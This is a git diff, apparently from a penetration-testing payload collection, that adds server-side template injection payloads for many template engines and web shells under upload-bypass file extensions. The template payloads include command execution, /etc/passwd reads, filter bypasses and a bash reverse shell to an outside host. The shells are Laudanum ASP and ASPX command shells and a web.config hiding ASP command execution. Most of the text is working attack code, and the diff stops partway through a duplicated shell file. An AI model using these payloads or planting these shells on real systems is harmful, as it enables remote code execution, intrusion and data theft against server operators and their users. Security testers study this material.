+{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
+{$smarty.version}
+{php}echo `id`;{/php}
+{{['id']|filter('system')}}
+{{['cat\x20/etc/passwd']|filter('system')}}
+{{['cat$IFS/etc/passwd']|filter('system')}}
+{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
+{{request|attr(["_"*2,"class","_"*2]|join)}}
+{{request|attr(["__","class","__"]|join)}}
+{{request|attr("__class__")}}
+{{request.__class__}}
+{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
+{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
+${T(java.lang.System).getenv()}
+${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
+${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
\ No newline at end of file
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index f994467e..5998047b 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -7,7 +7,7 @@
 * [Tools](#tools)
 * [Methodology](#methodology)
 * [Ruby](#ruby)
-  * [Basic injection](#basic-injection)
+  * [Basic injections](#basic-injections)
   * [Retrieve /etc/passwd](#retrieve--etc-passwd)
   * [List files and directories](#list-files-and-directories)
 * [Java](#java)
@@ -17,11 +17,15 @@
 * [Twig](#twig)
   * [Basic injection](#basic-injection)
   * [Template format](#template-format)
+  * [Arbitrary File Reading](#arbitrary-file-reading)
   * [Code execution](#code-execution)
 * [Smarty](#smarty)
 * [Freemarker](#freemarker)
   * [Basic injection](#basic-injection)
   * [Code execution](#code-execution)
+* [Peeble](#peeble)
+  * [Basic injection](#basic-injection)
+  * [Code execution](#code-execution)
 * [Jade / Codepen](#jade---codepen)
 * [Velocity](#velocity)
 * [Mako](#mako)
@@ -37,6 +41,10 @@
 * [Jinjava](#jinjava)
   * [Basic injection](#basic-injection)
   * [Command execution](#command-execution)
+* [ASP.NET Razor](#aspnet-razor)
+  * [Basic injection](#basic-injection)
+  * [Command execution](#command-execution)
+* [References](#references)
 
 ## Tools
 
@@ -55,12 +63,20 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment
 
 ## Ruby
 
-### Basic injection
+### Basic injections
+
+ERB:
 
 ```ruby
 <%= 7 * 7 %>
 ```
 
+Slim:
+
+```ruby
+#{ 7 * 7 }
+```
+
 ### Retrieve /etc/passwd
 
 ```ruby
@@ -73,6 +89,14 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment
 <%= Dir.entries('/') %>
 ```
 
+### Code execution
+
+Execute code using SSTI for Slim engine.
+
+```powershell
+#{ %x|env| }
+```
+
 ## Java
 
 ### Basic injection
@@ -106,6 +130,8 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
 ```python
 {{7*7}}
 {{7*'7'}} would result in 49
+{{dump(app)}}
+{{app.request.server.all|join(',')}}
 ```
 
 ### Template format
@@ -122,17 +148,34 @@ $output = $twig > render (
 );
 ```
 
+### Arbitrary File Reading
+
+```python
+"{{'/etc/passwd'|file_excerpt(1,30)}}"@
+```
+
 ### Code execution
 
 ```python
 {{self}}
 {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
+{{['id']|filter('system')}}
+{{['cat\x20/etc/passwd']|filter('system')}}
+{{['cat$IFS/etc/passwd']|filter('system')}}
+```
+
+Example with an email passing FILTER_VALIDATE_EMAIL PHP.
+
+```powershell
+POST /subscribe?0=cat+/etc/passwd HTTP/1.1
+email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
 ```
 
 ## Smarty
 
 ```python
+{$smarty.version}
 {php}echo `id`;{/php}
 {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
 ```
@@ -150,6 +193,32 @@ The template can be `${3*3}` or the legacy `#{3*3}`
 ```js
 <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
 [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
+${"freemarker.template.utility.Execute"?new()("id")}
+```
+
+## Pebble
+
+### Basic injection
+
+```java
+{{ someString.toUPPERCASE() }}
+```
+
+### Code execution
+
+```java
+{% set cmd = 'id' %}
+{% set bytes = (1).TYPE
+     .forName('java.lang.Runtime')
+     .methods[6]
+     .invoke(null,null)
+     .exec(cmd)
+     .inputStream
+     .readAllBytes() %}
+{{ (1).TYPE
+     .forName('java.lang.String')
+     .constructors[0]
+     .newInstance(([bytes]).toArray()) }}
 ```
 
 ## Jade / Codepen
@@ -187,9 +256,9 @@ ${x}
 ## Jinja2
 
 [Official website](http://jinja.pocoo.org/)
-> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
+> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.  
 
-### Basic injection
+### Basic injection
 
 ```python
 {{4*4}}[[5*5]]
@@ -253,14 +322,41 @@ Listen for connexion
 nv -lnvp 8000
 ```
 
-Inject this template
+#### Exploit the SSTI by calling subprocess.Popen.
+:warning: the number 396 will vary depending of the application.
 
 ```python
-{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
-{{ config.from_pyfile('/tmp/evilconfig.cfg') }}  # load the evil config
-{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
+{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
+{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
 ```
 
+#### Exploit the SSTI by calling Popen without guessing the offset
+
+```python
+{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
+```
+
+Simply modification of payload to clean up output and facilitate command input (https://twitter.com/SecGus/status/1198976764351066113)
+In another GET parameter include a variable named "input" that contains the command you want to run (For example: &input=ls)
+
+```python
+{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
+```
+
+#### Exploit the SSTI by writing an evil config file.
+
+```python
+# evil config
+{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} 
+
+# load the evil config
+{{ config.from_pyfile('/tmp/evilconfig.cfg') }}  
+
+# connect to evil host
+{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }} 
+```
+
+
 ### Filter bypass
 
 ```python
@@ -294,6 +390,11 @@ Bypassing `|join`
 http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
 ```
 
+Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by https://twitter.com/SecGus:
+```python
+{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
+```
+
 ## Jinjava
 
 ### Basic injection
@@ -320,6 +421,21 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
 ```
 
+## ASP.NET Razor
+
+### Basic injection
+
+```powershell
+@(1+2)
+```
+
+### Command execution 
+
+```csharp
+@{
+  // C# code
+}
+```
 
 ## References
 
@@ -334,4 +450,6 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
 * [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw)
 * [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/)
 * [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
-* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
\ No newline at end of file
+* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
+* [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)
+* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)
\ No newline at end of file
diff --git a/Type Juggling/README.md b/Type Juggling/README.md
index 2c7d7b1b..c51c805c 100644
--- a/Type Juggling/README.md	
+++ b/Type Juggling/README.md	
@@ -44,8 +44,11 @@ If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP
 
 | Hash | “Magic” Number / String    | Magic Hash                                    | Found By      |
 | ---- | -------------------------- |:---------------------------------------------:| -------------:|
-| MD5  | 240610708                  | 0e462097431906509019562988736854              | Michal Spacek |
+| MD5  | 240610708                  | 0e462097431906509019562988736854              | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
 | SHA1 | 10932435112                | 0e07766915004133176347055865026311692244      | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
+| SHA-224 | 10885164793773          | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) |
+| SHA-256 | 34250003024812          | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) |
+| SHA-256 | TyNOQHUS                | 0e66298694359207596086558843543959518835691168370379069085300385 | [@Chick3nman512](https://twitter.com/Chick3nman512/status/1150137800324526083)
 
 ```php
 <?php
diff --git a/Upload Insecure Files/Configuration IIS web.config/web.config b/Upload Insecure Files/Configuration IIS web.config/web.config
index 7036fdcc..c14f37e5 100644
--- a/Upload Insecure Files/Configuration IIS web.config/web.config	
+++ b/Upload Insecure Files/Configuration IIS web.config/web.config	
@@ -2,7 +2,7 @@
 <configuration>
    <system.webServer>
       <handlers accessPolicy="Read, Script, Write">
-         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64″ />
+         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
       </handlers>
       <security>
          <requestFiltering>
diff --git a/Upload Insecure Files/Configuration IIS web.config/web.web.config b/Upload Insecure Files/Configuration IIS web.config/web.web.config
new file mode 100644
index 00000000..6e02a37f
--- /dev/null
+++ b/Upload Insecure Files/Configuration IIS web.config/web.web.config	
@@ -0,0 +1,65 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<configuration>
+   <system.webServer>
+      <handlers accessPolicy="Read, Script, Write">
+         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
+      </handlers>
+      <security>
+         <requestFiltering>
+            <fileExtensions>
+               <remove fileExtension=".config" />
+            </fileExtensions>
+            <hiddenSegments>
+               <remove segment="web.config" />
+            </hiddenSegments>
+         </requestFiltering>
+      </security>
+   </system.webServer>
+</configuration>
+<!--
+<% Response.write("-"&"->")%>
+<%
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+Function getCommandOutput(theCommand)
+    Dim objShell, objCmdExec
+    Set objShell = CreateObject("WScript.Shell")
+    Set objCmdExec = objshell.exec(thecommand)
+
+    getCommandOutput = objCmdExec.StdOut.ReadAll
+end Function
+%>
+
+<BODY>
+<FORM action="" method="GET">
+<input type="text" name="cmd" size=45 value="<%= szCMD %>">
+<input type="submit" value="Run">
+</FORM>
+
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<%Response.Write(Request.ServerVariables("server_name"))%>
+<p>
+<b>The server's port:</b>
+<%Response.Write(Request.ServerVariables("server_port"))%>
+</p>
+<p>
+<b>The server's software:</b>
+<%Response.Write(Request.ServerVariables("server_software"))%>
+</p>
+<p>
+<b>The server's software:</b>
+<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
+<% szCMD = request("cmd")
+thisDir = getCommandOutput("cmd /c" & szCMD)
+Response.Write(thisDir)%>
+</p>
+<br>
+</BODY>
+
+
+
+<%Response.write("<!-"&"-") %>
+-->
diff --git a/Upload Insecure Files/Extension ASP/shell.asa b/Upload Insecure Files/Extension ASP/shell.asa
new file mode 100644
index 00000000..b2caf599
--- /dev/null
+++ b/Upload Insecure Files/Extension ASP/shell.asa	
@@ -0,0 +1,83 @@
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' ***  http://laudanum.secureideas.net
+' ***  laudanum@secureideas.net
+' ***
+' ***  Project Leads:
+' ***         Kevin Johnson <kjohnson@secureideas.net
+' ***         Tim Medin <tim@securitywhole.com>
+' ***
+' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' ***   Updated and fixed by Robin Wood <Digininja>
+' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite  Boston, MA   USA.
+' ***
+' ***************************************************************************** */
+
+
+' can set this to 0 for never time out but don't want to kill the server if a script
+' goes into a loop for any reason
+Server.ScriptTimeout = 180
+
+ip=request.ServerVariables("REMOTE_ADDR")
+if ip<>"1.2.3.4" then
+ response.Status="404 Page Not Found"
+ response.Write(response.Status)
+ response.End
+end if
+
+if Request.Form("submit") <> "" then
+   Dim wshell, intReturn, strPResult
+   cmd = Request.Form("cmd")
+   Response.Write ("Running command: " & cmd & "<br />")
+   set wshell = CreateObject("WScript.Shell")
+   Set objCmd = wShell.Exec(cmd)
+   strPResult = objCmd.StdOut.Readall()
+
+   response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
+
+   set wshell = nothing
+end if
+
+%>
+<html>
+<head><title>Laundanum ASP Shell</title></head>
+<body onload="document.shell.cmd.focus()">
+<form action="shell.asp" method="POST" name="shell">
+Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
+<input type="submit" name="submit" value="Submit" />
+<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
+<p>Example command to do a directory listing:<br>
+%ComSpec% /c dir
+</form>
+<hr/>
+<address>
+Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+Written by Tim Medin.<br/>
+Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+</address>
+</body>
+</html>
\ No newline at end of file
diff --git a/Upload Insecure Files/Extension ASP/shell.asmx b/Upload Insecure Files/Extension ASP/shell.asmx
new file mode 100644
index 00000000..b2caf599
--- /dev/null
+++ b/Upload Insecure Files/Extension ASP/shell.asmx	
@@ -0,0 +1,83 @@
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' ***  http://laudanum.secureideas.net
+' ***  laudanum@secureideas.net
+' ***
+' ***  Project Leads:
+' ***         Kevin Johnson <kjohnson@secureideas.net
+' ***         Tim Medin <tim@securitywhole.com>
+' ***
+' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' ***   Updated and fixed by Robin Wood <Digininja>
+' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite  Boston, MA   USA.
+' ***
+' ***************************************************************************** */
+
+
+' can set this to 0 for never time out but don't want to kill the server if a script
+' goes into a loop for any reason
+Server.ScriptTimeout = 180
+
+ip=request.ServerVariables("REMOTE_ADDR")
+if ip<>"1.2.3.4" then
+ response.Status="404 Page Not Found"
+ response.Write(response.Status)
+ response.End
+end if
+
+if Request.Form("submit") <> "" then
+   Dim wshell, intReturn, strPResult
+   cmd = Request.Form("cmd")
+   Response.Write ("Running command: " & cmd & "<br />")
+   set wshell = CreateObject("WScript.Shell")
+   Set objCmd = wShell.Exec(cmd)
+   strPResult = objCmd.StdOut.Readall()
+
+   response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
+
+   set wshell = nothing
+end if
+
+%>
+<html>
+<head><title>Laundanum ASP Shell</title></head>
+<body onload="document.shell.cmd.focus()">
+<form action="shell.asp" method="POST" name="shell">
+Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
+<input type="submit" name="submit" value="Submit" />
+<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
+<p>Example command to do a directory listing:<br>
+%ComSpec% /c dir
+</form>
+<hr/>
+<address>
+Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+Written by Tim Medin.<br/>
+Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+</address>
+</body>
+</html>
\ No newline at end of file
diff --git a/Upload Insecure Files/Extension ASP/shell.asp b/Upload Insecure Files/Extension ASP/shell.asp
new file mode 100644
index 00000000..b2caf599
--- /dev/null
+++ b/Upload Insecure Files/Extension ASP/shell.asp	
@@ -0,0 +1,83 @@
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' ***  http://laudanum.secureideas.net
+' ***  laudanum@secureideas.net
+' ***
+' ***  Project Leads:
+' ***         Kevin Johnson <kjohnson@secureideas.net
+' ***         Tim Medin <tim@securitywhole.com>
+' ***
+' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' ***   Updated and fixed by Robin Wood <Digininja>
+' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite  Boston, MA   USA.
+' ***
+' ***************************************************************************** */
+
+
+' can set this to 0 for never time out but don't want to kill the server if a script
+' goes into a loop for any reason
+Server.ScriptTimeout = 180
+
+ip=request.ServerVariables("REMOTE_ADDR")
+if ip<>"1.2.3.4" then
+ response.Status="404 Page Not Found"
+ response.Write(response.Status)
+ response.End
+end if
+
+if Request.Form("submit") <> "" then
+   Dim wshell, intReturn, strPResult
+   cmd = Request.Form("cmd")
+   Response.Write ("Running command: " & cmd & "<br />")
+   set wshell = CreateObject("WScript.Shell")
+   Set objCmd = wShell.Exec(cmd)
+   strPResult = objCmd.StdOut.Readall()
+
+   response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
+
+   set wshell = nothing
+end if
+
+%>
+<html>
+<head><title>Laundanum ASP Shell</title></head>
+<body onload="document.shell.cmd.focus()">
+<form action="shell.asp" method="POST" name="shell">
+Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
+<input type="submit" name="submit" value="Submit" />
+<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
+<p>Example command to do a directory listing:<br>
+%ComSpec% /c dir
+</form>
+<hr/>
+<address>
+Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+Written by Tim Medin.<br/>
+Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+</address>
+</body>
+</html>
\ No newline at end of file
diff --git a/Upload Insecure Files/Extension ASP/shell.aspx b/Upload Insecure Files/Extension ASP/shell.aspx
new file mode 100644
index 00000000..5de53adb
--- /dev/null
+++ b/Upload Insecure Files/Extension ASP/shell.aspx	
@@ -0,0 +1,129 @@
+<%@ Page Language="C#"%>
+<%@ Import Namespace="System" %>
+
+<script runat="server">
+
+/* *****************************************************************************
+***
+*** Laudanum Project
+*** A Collection of Injectable Files used during a Penetration Test
+***
+*** More information is available at:
+***  http://laudanum.secureideas.net
+***  laudanum@secureideas.net
+***
+***  Project Leads:
+***         Kevin Johnson <kjohnson@secureideas.net>
+***         Tim Medin <tim@securitywhole.com>
+***
+*** Copyright 2012 by Kevin Johnson and the Laudanum Team
+***
+********************************************************************************
+***
+*** This file provides shell access to the system.
+***
+********************************************************************************
+*** This program is free software; you can redistribute it and/or
+*** modify it under the terms of the GNU General Public License
+*** as published by the Free Software Foundation; either version 2
+*** of the License, or (at your option) any later version.
+***
+*** This program is distributed in the hope that it will be useful,
+*** but WITHOUT ANY WARRANTY; without even the implied warranty of
+*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*** GNU General Public License for more details.
+***
+*** You can get a copy of the GNU General Public License from this
+*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+*** You can also write to the Free Software Foundation, Inc., 59 Temple
+*** Place - Suite 330, Boston, MA  02111-1307, USA.
+***
+***************************************************************************** */
+
+string stdout = "";
+string stderr = "";
+
+void die() {
+	//HttpContext.Current.Response.Clear();
+	HttpContext.Current.Response.StatusCode = 404;
+	HttpContext.Current.Response.StatusDescription = "Not Found";
+	HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
+	HttpContext.Current.Server.ClearError();
+	HttpContext.Current.Response.End();
+}
+
+void Page_Load(object sender, System.EventArgs e) {
+
+	// Check for an IP in the range we want
+	string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1"};
+	
+	// check if the X-Fordarded-For header exits
+	string remoteIp;
+	if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
+		remoteIp = Request.UserHostAddress;
+	} else {
+		remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0]; 
+	}
+
+	bool validIp = false;
+	foreach (string ip in allowedIps) {
+		validIp = (validIp || (remoteIp == ip));
+	}
+	
+	if (!validIp) {
+		die();
+	}
+	
+	if (Request.Form["c"] != null) {
+	// do or do not, there is no try
+	//try {
+		// create the ProcessStartInfo using "cmd" as the program to be run, and "/c " as the parameters.
+		// "/c" tells cmd that we want it to execute the command that follows, and exit.
+		System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + Request.Form["c"]);
+
+		// The following commands are needed to redirect the standard output and standard error.
+		procStartInfo.RedirectStandardOutput = true;
+		procStartInfo.RedirectStandardError = true;
+		procStartInfo.UseShellExecute = false;
+		// Do not create the black window.
+		procStartInfo.CreateNoWindow = true;
+		// Now we create a process, assign its ProcessStartInfo and start it
+		System.Diagnostics.Process p = new System.Diagnostics.Process();
+		p.StartInfo = procStartInfo;
+		p.Start();
+		// Get the output and error into a string
+		stdout = p.StandardOutput.ReadToEnd();
+		stderr = p.StandardError.ReadToEnd();
+	//}
+	//catch (Exception objException)
+	//{
+	}
+}
+</script>
+<html>
+<head><title>Laundanum ASPX Shell</title></head>
+<body onload="document.shell.c.focus()">
+
+<form method="post" name="shell">
+cmd /c <input type="text" name="c"/>
+<input type="submit"><br/>
+STDOUT:<br/>
+<pre><% = stdout.Replace("<", "&lt;") %></pre>
+<br/>
+<br/>
+<br/>
+STDERR:<br/>
+<pre><% = stderr.Replace("<", "&lt;") %></pre>
+
+
+</form>
+
+  <hr/>
+  <address>
+  Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+  Written by Tim Medin.<br/>
+  Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+  </address>
+
+</body>
+</html>
\ No newline at end of file
diff --git a/Upload Insecure Files/Extension ASP/shell.cer b/Upload Insecure Files/Extension ASP/shell.cer
new file mode 100644
index 00000000..b2caf599
--- /dev/null
+++ b/Upload Insecure Files/Extension ASP/shell.cer	
@@ -0,0 +1,83 @@
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
